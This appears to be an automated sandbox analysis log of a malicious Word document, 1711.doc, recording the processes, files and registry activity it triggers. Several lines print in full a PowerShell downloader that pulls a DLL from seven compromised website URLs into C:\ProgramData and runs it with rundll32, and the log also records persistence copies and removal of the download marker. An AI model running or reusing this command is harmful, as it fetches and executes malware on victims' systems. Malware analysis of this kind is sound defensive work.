              Source: ~WRF{3FBF80BF-E144-402A-AB00-22C522DF80B7}.tmp.0.drOLE document summary: title field not present or empty
              Source: ~WRF{3FBF80BF-E144-402A-AB00-22C522DF80B7}.tmp.0.drOLE document summary: author field not present or empty
              Source: ~WRF{3FBF80BF-E144-402A-AB00-22C522DF80B7}.tmp.0.drOLE document summary: edited time not present or 0
              Source: 1711.docVirustotal: Detection: 39%
              Source: 1711.docMetadefender: Detection: 20%
              Source: 1711.docReversingLabs: Detection: 57%
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
              Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
              Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
              Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
              Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
              Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWow64\rundll32.exe" C:\ProgramData\13791789.dll,f1158194191
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\13791789.dll",Control_RunDLL
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Pnxoind\oxhesd.gzk",OlFSBFftEbm
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Pnxoind\oxhesd.gzk",Control_RunDLL
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWow64\rundll32.exe" C:\ProgramData\13791789.dll,f1158194191
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\13791789.dll",Control_RunDLL
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Pnxoind\oxhesd.gzk",OlFSBFftEbm
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Pnxoind\oxhesd.gzk",Control_RunDLL
              Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{c53e07ec-25f3-4093-aa39-fc67ea22e99d}\InProcServer32
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{E3FF1F0A-4208-4AB1-BD02-5AC59AFBF013} - OProcSessId.datJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_615ABC70 SHGetFolderPathW,CoCreateInstance,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWow64\rundll32.exe" C:\ProgramData\13791789.dll,f1158194191
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6404:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3940:120:WilError_01
              Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
              Source: ~WRF{3FBF80BF-E144-402A-AB00-22C522DF80B7}.tmp.0.drInitial sample: OLE indicators vbamacros = False

              Data Obfuscation:

              barindex
              Suspicious powershell command line foundShow sources
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
              Obfuscated command line foundShow sources
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_046E12A1 push es; ret
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_615D8067 push ecx; ret
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_615B5C26 push ecx; ret
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00671229 push eax; retf
              Source: 13791789.dll.5.drStatic PE information: real checksum: 0x81586 should be: 0x7d179
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\13791789.dllJump to dropped file
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\13791789.dllJump to dropped file
              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Pnxoind\oxhesd.gzk (copy)Jump to dropped file
              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Pnxoind\oxhesd.gzk (copy)Jump to dropped file

              Hooking and other Techniques for Hiding and Protection:

              barindex
              Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
              Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Pnxoind\oxhesd.gzk:Zone.Identifier read attributes | delete
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_615B7C47 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
              Source: C:\Windows\System32\svchost.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
